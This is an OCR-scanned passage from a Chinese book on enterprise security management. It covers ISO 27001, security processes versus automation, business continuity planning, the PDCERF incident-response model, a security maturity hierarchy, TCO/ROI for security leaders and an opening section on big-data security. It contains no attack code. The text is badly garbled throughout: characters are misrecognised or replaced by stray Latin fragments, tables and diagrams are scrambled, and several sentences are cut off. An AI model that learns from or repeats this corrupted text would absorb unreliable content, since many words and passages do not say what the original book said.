则 相当 于 入 门 水 准 ， 就 好 像 高 等 数学 线性 代数 你 可 以 不 会 ,但 是 如 果 
你 连 9x9 乘 法 表 都 背 不 出 来 ， 那 只 能 永远 呆 在 家 里 不 出 门 了 ， 因 为 你 
连 买 10 个 苹果 找 你 多 少 钱 都 算 不 来 。ISO 27001 总 体 上 提供 了 一 个 框架 
性 的 认 知 。 


3. 厂 泛 的 兼容 性 


学 习 攻 防 技术 和 学 习 少 数 几 个 国际 标准 一 点 都 不 冲突 ， 南 向 北 癌 
都 是 人 为 划分 的 ， 除 非 坐 地 画 轿 ， 人 否则 完全 不 存在 这 种 天 然 障 碍 。 一 
个 优秀 的 甲 方 工程 师 就 是 应 该 系统 化 义 熟 悉 技 术 细 节 的 ， 对 于 开篇 所 
到 的 CSO 而 言 ， 没 有 视野 的 人 绝对 当 不 了 CSO。 


4. 局 限 性 


方法 论 的 作用 是 解决 企业 整体 安全 从 30 分 走向 50 分 的 问题 ， 这 个 
阶段 需要 具备 普 适 性 的 有 助 于 改善 基本 面 全 方位 提升 的 东西 。 但 是 到 
了 中 后 期 ， 这 些 吏 不 太 管用 了 ， 如 果 你 想 从 60 分 上 升 到 80 分 ， 不 能 
依赖 于 方法 论 ， 而 是 进入 安全 特性 改进 的 贴 吴 肉搏战 状 态 ， 很 多 竞争 
力也 许 只 有 几 十 条 规则 ， 但 是 这 些 从 表面 上 有 是 看 不 出 来 的 ， 只 有 依靠 
专业 人 士 的 技能 和 资源 的 集中 投入 才能 有 所 产 出 。 


3.10 wes RA” 


1. 人 的 问题 


在 传统 安全 领域 一 直 是 强调 流程 的 ， 但 是 互联 网 行业 有 一 点 反 流 
程 ， 甚 至 像 Facebook 这 样 的 公司 还 表示 除非 万 不 得 已 否则 不 会 新 建 一 
条 流程 来 解决 问题 。 那 安全 建设 到 拭 和 要 不 要 流程 。 首 先 有 流程 肯定 能 
解决 问题 ， 但 流程 化 是 不 是 最 佳 实践 则 不 确定 。 


于 是 先 解决 第 一 个 问题 ， 有 没有 可 能 没有 流程 ， 什 么 情况 下 可 能 
很 少 或 接近 于 没有 流程 。 假 如 公司 的 人 很 少 ， 从 工 位 上 站 起 来 束 能 
到 全 公司 的 人 ， 要 发 布 版 本 吼 一 嗓子 全 员 都 能 听 到 ， 这 种 情况 下 确实 
不 需要 什么 流程 ， 不 只 是 安全 流程 ， 其 他 的 流程 也 没 必 要 。 


如 条 组 织 比较 大 ， 单 纯 一 个 发 布 行为 会 涉及 很 多 跨 部 门 的 人 ， 甚 
至 地 域 上 都 是 分 布 式 的 团队 ， 参 与 活动 的 人 员 行 为 即便 是 都 挂 在 公司 
内 部 的 IM 工 具 上 一 致 性 也 无 法 保证 ， 那 这 个 时 候 为 了 尽 可 能 规避 人 犯 
错 ， 束 会 制定 一 些 流 程 。 随 痢 组 织 越 来 越 大 ， 流 程 会 越 来 越 多 ， 并 且 
流程 大 都 不 是 “进取 和 开放 ”型 的 ， 而 是 “错误 规避 ”型 的 ， 整 个 组 织 的 
流程 都 会 表现 为 在 某 个 方 网 上 高 度 优化 ， 从 而 进入 基因 决定 理论 的 影 
啊 范 畴 ， 流 程 的 制作 者 为 了 保护 既 有 权益 ， 大 多 会 僵化 执行 流程 ， 开 
始 走 同 目 己 的 反面 。 作 为 安全 负责 人 人， 必须 周 期 性 地 审视 安全 和 IT 治 
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张 、 新 建 业务 线 的 时 候 考 虑 一 下 原 有 的 流程 是 否 适 用 于 新 的 领域 。 如 
果 安 全 人 负责 人 对 这 些 问题 比较 漠视 ， 要 么 对 业务 不 敏感 ， 要 么 目 映 所 
前 进入 不 受 激励 的 保 马 纱 帆 状态 了 。 


2. 机 器 的 问题 


流程 是 用 来 解决 人 容易 犯错 的 问题 ， 而 不 是 用 来 解决 机 右 犯 错 的 
问题 ， 如 果 把 流程 用 于 解决 机 右 犯 错 的 问题 那 束 会 出 出 笑话 来 。 比 如 
程序 发 布 前 ， 和 需要 有 一 个 安全 检查 的 环节 ， 如 果 不 约定 流程 ， 很 容易 
汤 挥 ， 这 古 在 解决 人 步 又 错误 的 问题 。 但 是 10000 台 机 絮 打 同一 个 补 
了 本， 有 9990 台 都 打上 了 没 问 题 ， 剩 下 10 台 补丁 有 问题 ， 这 种 问题 应 该 
通过 技术 手段 解决 ， 而 不 是 通过 流程 来 解决 ， 如 何 让 系统 和 程序 返回 
人 所 期 户 的 结果 是 技术 需要 解决 的 问题 ， 跟 流程 没关系 ， 当 然 有 人 说 
跟 程序 的 执行 流程 (routine) 有 关系 ， 是 的 此 流程 非 彼 流程 。 通 过 人 
为 的 流程 来 解决 ， 人 的 工作 会 越 来 越 多 ， 人 忙于 救火 之 中 不 堪 重 负 ， 通 
过 技术 途径 解决 ， 组 织 的 目 动 化 程度 会 越 来 越 高 ， 生 产 力 会 越 来 越 
强 ， 两 条 路 最 终 会 使 团队 走向 两 极 分 化 ， 迁 哪 一 极 束 看 团队 的 基因 
了 。 在 前 面 的 例子 中 为 了 衡量 流程 的 执行 结果 ， 我 们 通常 会 引入 一 些 
技术 的 目 动 化 手段 来 检测 ， 例 如 被 动 式 扫 朱 ， 有 些 开 发 和 运 维 调控 安 
全 审计 环 市 直接 上 线 了 ， 也 能 把 这 些 程序 的 URL 找 到 抓 下 来 扫 ， 当 然 
它 并 不 能 蔡 代 流程 本 身 的 作用 。 


3.11 业务 持续 性 管理 


业务 持续 性 管理 (BCM) 是 一 个 较 高 层次 的 管理 机 制 ， 通 常 对 应 
到 公司 层面 ， 它 使 企业 认识 到 潜在 的 危机 和 相关 影响 ， 制 订 啊 应 、 业 
务 和 连续 性 的 恢复 计划 ， 其 总 体 目 标 在 于 提高 企业 的 风险 防范 能 力 ， 
有 效 地 啊 应 非 计划 的 业务 破坏 并 降低 不 民 影响 。 以 2015 年 中 国 互 联网 
行业 的 标志 性 事件 为 例 ， 网 易 、 携 程 、 支 付 宝 先 后 发 生 大 规模 服务 中 


晰 ， 这 个 问题 惑 是 业务 持续 性 管理 的 场景 。 


BCM 的 全 生命 周期 方法 论 如 图 3-4 所 示 ， 其 中 BIA (Business Impact 
Analysis， 业 务 影响 分 析 ) ` Recovery Strategy (WARK) ， 实 施 以 
及 测试 和 演练 都 是 很 重要 的 环节 。BIA 的 例子 ， 如 果 QQ 的 数据 库 被 拖 
库 了 对 腾讯 有 什么 影响 ， 如 果 文 付 宝 被 拖 库 了 对 阿里 有 什么 影响 ? 这 
两 个 问题 可 能 有 点 极端 ， 再 举 几 个 可 能 性 更 大 一 总 的 : 如 果 公 司 官 网 
遭受 DDoS 攻击 ， 流 量 一 度 超过 防御 的 最 大 值 会 有 什么 影响 ”如果 公 司 
一 个 主 站 页 面 被 挂 了 马 会 有 什么 影响 ? 好 像 这 些 问 题 都 比较 头疼 ， 再 
举 一 个 轻微 一 点 的 ， 如 果 一 个 客服 的 论坛 账号 被 瓷 了 会 有 什么 影响 ， 
尽管 这 个 问题 在 入 侵 者 那里 可 能 会 玩 成 蝴蝶 效应 ， 甚 至 变 成 APT， 但 
是 一 般 情 况 下 这 个 还 是 比 之 前 的 例子 要 轻微 得 多 ， 不 能 getshell 的 话 ， 
改 一 下 口令 束 完 事 了 。 从 这 里 也 可 以 看 出 BIA 跟 基于 资产 权重 的 风险 管 


理 方法 论 类 似 ， 跟 威胁 建 模 也 有 点 异曲同工 的 味道 ， 只 不 过 威胁 建 模 
关注 的 是 具体 的 系统 ， 而 BIA 关 注 的 是 公司 的 业务 。 
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图 3-4 BCM 的 生命 周期 


对 于 风 控 策略 ， 大 多 数 人 会 想到 DB 审计 ， 纵 深 防 御 OS 防 护 ， 应 用 
层 防 止 SQL 注 入 ， 部 署 WAF 等 ， 这 些 东 西 原先 放 在 安全 体系 里 “ 狐 
似 ? 完 整 ， 而 如 今 放 到 BCM 里 一 下 子 就 不 完整 了 ， 为 什么 ? 显然 你 仍然 
没有 回答 上 述 问题 : 假如 被 拖 库 了 怎么 办 。 有 的 人 认为 管理 是 无 用 
的 ，BCM 也 无 助 于 降低 程序 的 安全 漏洞 率 ， 但 是 只 会 攻防 ， 只 会 堵 洞 
显然 也 解决 不 了 企业 安全 中 的 那 许 许多 多 问题 。 这 个 问题 很 现实 ， 作 


为 安全 负责 人 ， 老 板 一 定 会 问 你 假如 被 拖 库 了 怎么 办 ， 有 人 会 说 “我 引 
知 辞 职 "， 这 样 的 回答 似乎 很 有 责任 感 ， 但 对 面 的 人 可 能 就 会 想 : “你 
EMTA, SRB REST, WEAT? ” 


oF 


一 个 典型 的 BCP (Business Continuity Plan) 如 表 3-2 所 示 。 


表 3-2 ”典型 的 BCP 示 例 


业务 持续 性 计划 灾难 恢复 业务 恢复 业务 继续 持续 性 规划 
目标 关键 电脑 、 应 用 关键 业务 流程 流程 还 原 流程 变通 方案 
聚焦 数据 恢复 流程 恢复 返回 正常 状态 将 就 使 用 
示例 事件 大 型 机 故障 实验 室 泛 建筑 物 火 灾 应 用 丢失 
解决 方案 热 备 份 站 点 恢复 烘 干 和 重启 新 的 装备 和 建筑 物 | ”使 用 手工 流程 


这 里 面 定义 了 一 系列 的 视角 维度 和 与 之 对 应 的 措施 ， 不 具体 展开 
了 ， 对 于 安全 团队 而 言 ， 通 常 需要 根据 公司 所 有 的 业务 简单 做 BIA， 然 
后 根据 所 有 的 开 资 产权 重 分 类 分 级 ， 并 制定 对 应 的 保护 集 略 以 及 关键 
安全 事件 发 生 后 的 应 急 预 案 。 应 急 预 案 不 只 是 纸 面 上 的 流程 ， 还 包括 
了 一 系列 的 技术 性 措施 ， 例 如 你 的 账号 保护 体系 。 现 实生 活 中 有 的 人 
比较 反感 理论 派 的 原因 是 只 制定 纸 面 的 策略 ， 而 忽略 技术 环 市 的 
PDCA， 不 关注 如 何 优化 纵深 防御 来 缓解 保护 失效 后 持续 缩小 攻击 面 和 
影响 面 的 问题 ， 不 关注 阻 断 kill chain， 不 重视 安全 事件 发 生 后 的 应 急 体 
系 工具 建设 ， 以 及 关键 系统 的 功能 中 是 否 文 持 有 损 服 务 策略 等 ， 这 些 
问题 导致 了 技术 派 认为 管理 是 无 用 的 ， 甚 至 连 安全 标准 都 背 了 黑 锅 ， 
其 实 标 准 是 无 罪 的 ，BCM 是 好 东西 。 


项 目 治 理 / 项 目 管 理 


流程 关系 定义 弹性 / 可 用 性 /恢复 策略 资源 获得 与 实施 


(行业 标准 ) 活动 /程序 开发 


风险 评 信 危机 管理 / 应急 响 应 ey 
(风险 地 图 ) 培训 与 意识 
建筑 ( 设 | 设备 | 技术 ( 灾 | 人 力 资源 s 
施 ) 恢复 | 恢复 | 难 ) Hee A e 
业务 影响 分 析 = we ue 


持续 改进 与 质量 保证 


图 3-5 ”德勤 的 BCM 方 法 论 实 施 路 径 


图 3-5 是 德勤 的 BCM 方 法 论 实施 路 径 图 ， 更 多 关于 BCM 的 内 容 可 以 
上 网 自己 搜索 ， 这 里 不 继续 展开 了 。 


“德勤 业务 连续 性 计划 和 管理 ” (http://www.davislogic.com/bcm.htm 


3.12 ”关于 应 急 啊 应 


很 多 人 认为 应 急 啊 应 驶 是 SSH 连 上 被 黑 的 机 需 去 碍 rootkit， 直 到 今 
天 我 也 基本 不 漏 读 那些 思路 请 晰 的 入 侵 分 析 的 paper， 只 不 过 工程 师 天 
注 的 跟 CSO 关 注 的 还 是 有 些 不 一 样 。10 年 前 ， 我 是 乙方 工程 师 时 去 客 
户 机 瑚 上 得 后 门 ， 虽 然 没 有 犯 过 明显 的 大 错误 ， 但 有 时 候 还 是 很 介 把 
系统 搞 幸 了 ， 毕 竟 人 家 也 没 备份 数据 ， 所 以 总 归心 里 不 踏实 。 如 果 你 
在 SRC 接 到 日 帽子 报 漏洞 ， 打 开 一 看 人 已 经 入侵 到 系统 了 ， 人 然后 束 突 
然 心 里 一 沉 ， 人 慌 慌 张 张 就 要 了 个 root 账 号 SSH 连 上 去 了 ， 这 种 状态 其 实 
很 不 好 ， 搞 不 好 反 添 乱 ， 一 个 不 小 心 融 发 生 了 点 小 意外 把 什么 东西 摘 
ET, ARCH BOMBA I 。 


Detection Containment 
Preparation & Eradication ro", 
Analysis & Recovery vity 


紧急 事件 检测 初始 响应 事件 分 级 
.防火墙 日 志 . 初步 判定 事件 类 型 、 | .决定 什么 对 自己 最 
. 系统 日 志 定义 事件 级 别 重要 
Web REA MD Eak . 为 紧急 事件 确定 优 
“IDS 日 志 . 为 紧急 事件 的 处 理 取 先 级 ， 更 有 效 的 利 
+ 可疑 的 用 户 得 管理 方面 的 支持 用 资源 
.管理 员 报 告 “组 建 事件 处 理 小 组 * 不 是 每 个 紧急 事件 
. 制定 安全 事件 响应 策略 都 需要 平等 对 竺 

“事件 起 因 分 析 
AE 。 事 件 取证 追查 

. 系统 后 门 检查 、 漏 洞 分 析 

* 数据 收集 、 数 据 分 析 


图 3-6 ”应 急 啊 应 的 PDCERE 模 型 


应 急 响 应 有 一 个 PDCERF 模 型 (也 可 以 参考 NIST SP800-61) ， 如 
图 3-6 所 示 。 简 单 说 来 就 是 一 连 串 步骤 。P 是 指 Preparation (准备 ) ， 之 
前 要 做 各 种 准备 工具 ， 具 体 一 点 的 比如 应 急 工 具 : 静态 编译 的 ]s、 
ifconfig、ps 等 总 归 是 要 事前 准备 好 。D 是 指 Detection (诊断 ) ， 初 步 诊 
断 发 生 了 什么 类 型 的 问题 ， 以 助 于 后 续 工 作 展开 ， 同 样 是 大 规模 流 
量 ，L4 DDoS，CC 还 是 蠕虫 健 发 ， 对 应 的 应 急 手 段 不 一 样 。C 征 指 
Containment (抑制 ，， 这 是 被 大 多 数 人 忽略 的 一 步 ， 首 先 应 该 是 抑制 
受害 范围 ， 隔 离 使 受害 面 不 继续 扩大 ， 再 追求 根治 ， 而 不 是 一 边 任 其 
蔓延 ， 一 边 去 查 后 门 ， 到 头 来 你 查 完 这 台 机 器 ， 入 侵 者 在 这 时 间 档 里 


NS 
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RETARA AEA, SKARET, FATAL ee RRR 
因 的 事情 。 接 下 来 整 古 大 多 数 人 最 熟悉 的 那 一 步 ，E 是 指 Eradication 
(根除 ) ， 寻 找 根 因 ， 封 堵 攻 击 源 。R 是 指 Recovery (WE) ， 把 业务 
恢复 至 正常 水 平 。 最 后 ，F 是 指 follow-up (跟踪 ) ， 监 控 有 无 异常 ， 报 
， 管 理 环 节 的 自省 和 改进 措施 ， 现 在 俗称 安全 运营 的 持续 改进 环 


Æ 
= 
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ITSM 的 思路 贯穿 于 企业 安全 建设 的 方方面面 ， 了 解 攻防 技术 只 有 是 
说 你 具备 了 参与 企业 安全 建设 的 技术 理论 基础 ， 但 并 不 代表 你 具备 了 
企业 安全 建设 的 正确 方法 。 之 前 说 到 换 制 的 环 刘 ， 首 先 要 了 解 业 务 、 
数据 流 、 各 服务 接口 调用 关系 ， 这 些 都 是 日 党 的 积累 ， 否 则 随便 一 个 
隅 离 又 把 什么 服务 搞 挂 了 。 反 过 来 倒 推 ， 如 果 安 全 团队 平时 连 个 数据 
流 图 都 没有 的 ， 发 现 单 点 出 现 问题 钙 状 时 大 致 的 系统 间 影 响 和 诬 在 的 
最 大 受害 范围 都 估计 不 出 来 的 ， 那 安全 建设 即便 是 救火 也 肯定 是 一 团 
TEM o 


3.13 Bench “SENS PPR EK 


可 按照 “ 马 斯 阁 需 求 ” 层 次 来 描述 安全 建设 的 需求 ， 如 图 3-7 所 示 。 
其 实 这 张 图 里 少 了 一 个 级 别 ， 束 是 LV0， 即 没有 安全 措施 。 


LV1 通 过 一 些 较为 基础 的 安全 措施 做 到 了 基础 的 访问 控制 ， 并 且 交 
付 的 系统 不 含有 明显 的 高 危 漏 洞 。 但 对 于 复杂 的 安全 事件 自身 没有 独 
立 处 理 的 能 力 ， 必 须 依赖 于 外 部 广 商 。 


LV2 有 专职 的 安全 团队 ， 有 攻防 技术 能 力 ， 能 做 到 有 火 必 救 ， 不 依 
赖 于 外 部 厂商。 但 在 安全 建设 上 缺乏 思路 ， 大 多 依赖 商业 产品 或 照搬 
已 有 的 安全 模式 。 


LV3 安 全 建设 呈现 初步 的 系统 化 ， 履 盖 全 生命 周期 ， 开 发 和 运 维 环 
万 都 有 必要 的 控制 流程 ， 主 要 的 系统 在 架构 上 都 会 考虑 安全 方案 ， 检 
测 和 防护 手段 能 因地制宜 。 


LV4 除 了 基础 架构 ， 应 用 ， 数 据 等 技术 层面 安全 能 做 到 全 生命 周期 
系统 化 建设 ， 业 务 层面 的 安全 问题 也 有 系统 化 解决 方案 。 安 全 此 时 不 
只 关注 技术 层面 的 攻防 对 抗 ， 也 关注 业务 形式 的 安全 以 及 墨 产 的 对 


抗 。 


LV5 安 全 建设 进入 最 佳 实践 阶段 ， 不 依赖 于 现 有 的 安全 机 制 ， 也 不 
依赖 于 厂商 的 安全 产品 ， 虽 说 自己 造 轮子 不 代表 最 佳 实践 ， 不 过 对 于 
互联 网 公司 攻防 和 业务 层面 的 安全 问题 ， 如 果 想 做 的 好 一 点 ， 不 自己 
发 明 轮 子 似乎 不 太 可 能 ， 至 少 现 在 市 场 上 缺少 很 多 针对 互联 网 的 解决 
方案 。 在 这 个 阶段 ， 严 重 的 安全 事件 几乎 很 少 发 生 ， 大 多 数 精力 都 会 
用 于 优化 现 有 系统 的 检测 和 拦截 率 。 

LV1 自己 认为 自己 是 安全 的 


评价 标准 : 做 过 渗透 测试 ， 交 
© 付 的 代码 没有 高 危 的 漏洞 


LV2 救火 的 能 力 
© 评价 标准 : 有 攻防 团队 ， 有 基 
本 的 入 侵 检测 能 力 


LV3 安全 体系 化 
© 评价 标准 : 接近 完整 的 纵深 防 
WERA, 覆盖 入侵 检测 和 防护 


安全 建设 的 
“ 马 斯 洛 需 求 ” 


LV4 业务 层面 安全 得 到 满足 
© 评价 标准 : 账号 等 基础 服务 都 
有 安全 风 控 措施 


©) LV5 用 先进 的 方式 实践 安全 

D 评价 标准 : 完整 的 纵深 防御 ， 
高 度 自动 化 ， 大 数据 和 机 器 学 
习 ， 精 确 对 抗 


图 3-7 ”安全 建设 的 “ 马 斯 洛 需求 "层次 


3.14 TCO 和 ROI 


企业 安全 建设 本 质 上 不 是 一 个 可 以 通过 完全 量化 的 指标 来 衡量 建 
设 得 好 与 坏 以 及 能 力 成 熟 度 的 事情 。 安 全 是 一 个 永 无 止境 的 投入 ， 永 
远 都 没有 办 法 提出 一 个 清单 ， 说 这 里 面 的 条 目 你 都 做 到 了 ， 安 全 就 很 
好 了 。 也 是 为 什么 等 级 保护 、ISO27001、PCI-DSS 这 类 企业 认证 可 以 
用 来 装点 “门面 "*， 在 广告 、 营 销 、 融 资 、 上 市 公司 内 控 等 环节 告诉 公 
众 目 己 是 有 那么 一 点 安全 能 力 的， 但 是 永远 都 不 可 能 说 我 是 无 懈 可 
击 。 某 些 老 板 在 台 上 走秀 时 吹牛 的 情节 请 自动 忽略 。 安 全 建设 的 好 坏 
不 只 是 依赖 于 安全 团队 的 强 弱 ， 还 跟 安 全 建设 本 身 所 消耗 的 金钱 和 资 
源 有 关 ， 大 多 数 企 业 都 不 是 土豪 级 的 公司 ， 拿 业界 最 住 实践 来 衡量 都 
缺少 前 提 条 件 ， 业 界 最 佳 实践 可 以 是 安全 团队 上 自己 的 追求 ， 但 不 是 安 
全 团队 工作 成 果 的 评价 标准 ， 因 为 现实 中 不 可 能 消耗 那么 多 钱 用 于 安 
全 建设 ， 而 一 定 是 根据 企业 所 处 的 阶段 投入 到 应 景 的 程度 适可而止 ， 
如 果 这 个 时 候 某 些 砖 家 一 定 要 拿 什 么 能 力 成 熟 度 模 型 来 评估 ， 诉 结果 
不 好 看 ， 你 可 以 很 理直气壮 的 告诉 对 方 从 现实 的 角度 出 发 无 可 厚 非 ， 
什么 阶段 就 是 应 该 做 什么 事 ， 拿 个 互联 网 行业 千 亿美 金 市 值 的 公司 
来 “ 套 ” 大 多 数 公司 纯 属 无 脑 行为 。 


可 用 于 评价 安全 建设 做 的 好 与 坏 的 唯一 标准 吏 是 ROI， 用 什么 样 
资源 (TCO) 产 出 什么 样 的 安全 效果 。 能 力 平庸 的 CSO 可 能 建 了 很 大 


的 安全 团队 也 还 是 频 出 安全 事件 ， 团 队 中 不 乏 张 口 融 是 “七 分 管理 ， 三 
分 技术 ”的 那 类 人 ， 而 面 癌 实 操 干 活 的 人 却 是 少数 且 没 有 地 位 的 工程 
师 ， 即 便 有 学 习 能 力 不 错 的 工程 师 也 没 法 系统 化 的 组 织 他 们 的 工作 ， 
任 其 目 生 目 灰 。 还 有 的 公司 不 缺 干将 ， 但 是 招 了 牛人 却 只 做 救火 之 
用 ， 到 头 来 的 产 出 和 一 文 没有 牛人 的 团队 相差 无 几 。 思 路 清晰 的 CSO 
即便 目 己 不 充当 工程 师 的 角色 ,也 能 以 一 文 精锐 小 团队 覆 志 企 业 中 绝 


KEKET ° 


在 互联 网 公司 ， 安 全 负责 人 最 可 能 影响 ROI 的 儿 个 因素 如 下 : 


-缺少 系统 化 蓝图 ， 对 安全 建设 的 全 局 以 及 分 解 后 的 轻重 没有 感性 
WAL, em eSB ABA ° 


对 管理 体系 和 工具 链 建 设 没 有 整体 认 知 ， 选 择 在 错误 的 时 间 点 做 
正确 的 事 。 


-把 安全 工作 当成 checklist 而 不 是 风险 管理 工作 ， 几 事 要 求 绝对 安 
全 而 不 能 接受 相对 风险 ， 对 下 属 求全 贡 备 ， 大 概 只 有 外 星人 能 满足 这 


弱 于 判断 安全 建设 在 实践 环节 的 好 与 坏 ， 搞 不 清楚 某 个 安全 机 制 
在 业界 属于 落后 水 平 ， 平 均 水 平 ， 还 是 领先 水 平 ， 以 及 某 种 安全 机 制 
对 于 曾 减 菏 类 风险 的 作用 强 弱 ， 容 易 被 执行 者 忽 悠 。 带 来 的 结果 束 是 
貌似 很 吾 很 努力 ， 但 收效 甚 微 。 


个 人 的 职场 步调 与 公司 发 展 的 阶段 不 一 致 ， 公 司 处 于 快速 扩张 时 
期 ， 而 安全 负责 人 本 人 则 采取 保守 谨慎 的 策略 。 
:只 务 内 勤 ， 不 管 外 联 ， 不 重视 生态 关系 建设 。 最 后 导致 小 问题 ， 


影响 。 


作为 一 个 风险 管理 型 的 角色 ， 而 不 是 直接 产生 利润 的 职能 ， 其 管 
理 癌 上 沟通 可 能 会 有 一 定 的 难度 ， 在 风险 取舍 方面 跟 上 下 左右 达成 一 
致 也 需要 提前 沟通 好 。 
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安全 在 当下 有 一 定 的 热度 ， 业 弄 处 于 一 种 声音 哮 杂 的 状态 ， 概 
念 、 名 词 很 多 ， 给 产业 提供 了 新 思路 和 新 方向 ， 但 同时 也 误导 人 “。 无 
其 是 狐 手 ， 基 本 功 还 没 做 好 号 被 靳 概念 市 着 跑 了 ， 结 采 都 以 为 目 己 在 
用 很 狐 的 概念 做 很 前 沿 的 事情 ， 实 际 上 可 能 地 基 都 没 建 好 就 开始 玩 拓 
慧 城市 了 。 本 草 将 介绍 大 数据 安全 中 的 一 些 概 念 ， 以 及 解决 方案 的 争 


te 
~~ 
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41 关于 大 数据 安全 


业界 对 大 数据 安全 的 讨论 铺天盖地 (如 图 4-1 所 示 ) ， 但 这 个 概念 
在 很 多 人 的 理解 中 可 能 是 混乱 和 错位 的 。 大 数据 安全 映 喘 到 一 个 很 大 
的 概念 ， 而 不 能 直接 对 应 到 具体 的 事情 上 ， 你 者 直接 说 大 数据 安全 ， 
对 方 往往 不 能 在 第 一 时 间 明 白 你 所 要 表达 的 意思 。 


1. 大 数据 安全 的 分 类 


第 一 类 : 关于 现今 流行 的 以 Hadoop 为 生态 的 离线 数据 处 理 大 数据 
架构 和 以 Storm 为 生态 的 流 式 计算 大 数据 染 构 ， 对 于 这 些 技术 方案 所 涉 
及 的 安全 风险 ， 例 如 Hadoop 的 认证 ， 数 据 的 加 密 问 题 ， 也 即 企业 在 部 
车 Hadoop/Storm 集 群 时 从 采集 存储 到 计算 这 恨 技术 以 构 本 号 所 涉及 的 


安全 问题 。 
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第 二 类 ， 以 海量 样本 + 机 器 学 习 的 方法 去 处 理 安全 检测 问题 ， 这 里 
的 大 是 指 样本 数量 大 ， 以 试图 获得 比 固定 样本 + 精确 匹配 算法 更 接近 事 
实 的 精准 判断 率 ， 例 如 360 的 QVM 引 擎 号称 在 云端 存储 20 亿 用 于 检测 恶 
意 代码 的 样本 ， 用 以 区 别传 统 的 特征 检测 。 这 一 类 理论 上 最 接近 大 数 
据 的 原生 概念 ， 但 是 能 不 能 做 得 比 传统 方法 更 好 ， 也 是 很 有 挑战 的 。 


第 三 类 ， 由 于 要 处 理 的 数据 量 比较 大 ， 传 统 的 单机 设备 处 理 不 
了 ， 所 以 需要 用 Hadoop 之 类 的 技术 解决 数据 处 理 中 的 数据 规模 和 实时 
性 要 求 这 两 个 性 能 问题 ,但 本 质 还 是 传统 BI 的 建 模 方法 ， 解 决 的 也 是 
一 个 传统 问题 。 当 下 大 多 数 属于 这 一 类 ， 有 既然 只 是 一 个 纯粹 的 性 能 问 


题 ， 在 有 大 数据 文 持 团 队 的 情况 下 ， 有 价值 的 部 分 主要 还 在 于 建 模 的 
规则 部 分 ， 即 对 安全 问题 的 检测 规则 。 


对 于 第 二 类 ， 样 本 数量 、 数 据 采 集 点 、 采 集 渠 道 症 其 核心 竞 争 
， 所 以 越 早 开 始 积 系数 据 ， 越 早 形成 大 数据 ， 便 形成 了 优势 的 壁 
o 而 对 于 第 三 类 ， 积 过 数据 的 多 少 则 无 所 请 ， 构 成 其 能 力 的 关键 还 
看 规则 的 健全 程度 。 
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第 三 类 是 目前 企业 安全 建设 中 实践 最 多 的 方案 ， 大 多 数 还 是 用 自 
己 产 生 的 数据 解决 自己 的 安全 问题 ， 即 用 VM1 产 生 的 系统 网 络 数据 检 
测 VM1 的 安全 状态 ， 而 不 是 用 VM2 产 生 的 系统 网 络 数据 检测 VM1 的 安 
全 状态 ， 也 很 少 用 VM1、VM2、VM3......VMx 产 生 的 全 局 数据 检测 
VM1 的 安全 状态 ， 尽 管 也 有 全 局 规则 ， 但 实际 效果 上 占 比 较 少 。 


在 甲 方 安全 团队 的 实际 工作 中 ， 第 二 类 问题 主要 留 给 AV 和 APT) © 
商 ， 以 购买 商业 产品 的 方法 获得 ， 并 且 场 景 主要 在 办 公 网 络 ， 对 于 比 
较 大 的 互联 网 公司 ， 也 有 将 机 器 学 习 用 于 Web 安 全 和 业务 层面 的 ， 而 对 
于 自己 动手 建设 的 部 分 更 多 聚焦 于 第 三 类 方案 ， 主 要 针对 生产 网 络 。 


2. 传 统 场景 和 大 型 互联 网 场景 


在 传统 安全 场景 下 (如 图 4-2 所 示 ) 通过 采集 各 个 终端 安全 软件 的 
告警 、 日 志 ， 各 个 网 络 设备 、 安 全 设备 的 日 志 告 警 到 一 个 数据 源 ， 用 


大 数据 进行 多 维度 关联 ， 最 后 展现 告警 ， 总 体 上 用 了 一 次 大 数据 计 
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图 4-2 ”传统 的 安全 场景 


而 在 大 型 互联 网 下 终端 可 能 不 直接 告警 (如 图 4-3 所 示 ) ， 而 是 以 
采集 数据 为 主 ， 在 每 一 个 维度 的 安全 解决 方案 上 都 会 有 上 自己 的 大 数据 
环境 ， 即 单 点 的 安全 监测 手段 全 部 大 数据 化 ， 通 过 第 一 次 大 数据 计算 
在 自己 的 纵向 层次 (例如 主机 入 侵 检 测 ) 上 产生 告警 ， 而 关联 分 析 则 
会 在 利用 第 一 次 大 数据 计算 结果 的 基础 上 提供 第 二 次 大 数据 计算 产生 
更 多 的 信息 。 是 否 在 单 维度 上 需要 用 到 大 数据 计算 环境 ， 取 决 于 IDC 规 


模 、 数 据 量 是 否 足够 大 ， 不 大 的 情况 下 关系 型 数据 库 + 墨 白 规则 也 可 以 
胜任 ， 而 很 大 的 时 候 往往 需要 用 到 大 数据 和 机 器 学 习 。 


NIDS back-end 
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图 4-3 ”大 型 互联 网 的 环境 
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整个 产业 处 于 变 音 时期， 安全 理念 和 技术 形态 都 在 不 断 进 步 。 有 
进取 心 的 安全 厂商 在 推出 新 的 解决 方案 的 同时 ， 也 有 茎 不 留情 地 指出 了 
过 去 产品 的 弱点 ， 例 如 在 APT 面 世 的 时 候 提 出 IDS 死 亡 了 ， 在 威胁 情报 
出 炉 的 时 候 提 出 防火 墙 、IPS 等 “ 老 三 样 ” 过 时 了 ， 也 有 些 人 预言 防火 墙 
会 消亡 之 类 的 。 


安全 厂商 这 么 说 虽然 显得 激进 ， 但 每 一 个 时 代 的 广告 不 都 这 样 
么 ， 无 论 如 何 都 不 能 算 错 。 对 于 甲 方 的 安全 人 员 来 说 ， 如 果 你 把 原 有 
的 解决 方案 体系 全 部 排除 在 外 ， 只 选择 新 兴 类 型 的 APT、 威胁 情报 、 
大 数据 类 安全 产品 ， 会 如 何 ? 显然 无 法 解决 现 有 环境 中 的 大 部 分 问 
题 。 新 兴 的 解决 方案 和 原来 的 安全 措施 本 质 上 是 演进 、 升 级 和 补充 的 
关系 ， 不 是 疹 代 的 关系 。 


OWASP 的 岂 起 跟 互 联网 Web 服务 的 大 范围 应 用 有 很 大 的 联系 ， 但 
在 某 种 意义 上 跟 防火 墙 这 个 古老 的 安全 产品 也 有 撤 不 了 的 关系 。 越 来 
越 多 的 管理 员 有 了 安全 意识 之 后 ， 很 多 站 点 只 开放 了 80 端 口 ， 应 用 层 
面 的 威胁 对 抗 成 了 主 战场 ， 防 火 墙 对 于 减少 攻击 面 起 了 非常 大 的 作 
用 。 男 一 方面 随 着 缓冲 区 洲 出 类 内 存 破坏 缓解 措施 的 成 熟 ， 二 进 制 利 
用 的 难度 越 来 越 蜗 ， 应 用 入 口 成 了 木 桶 理论 的 短 板 ， 也 就 古 最 容易 下 


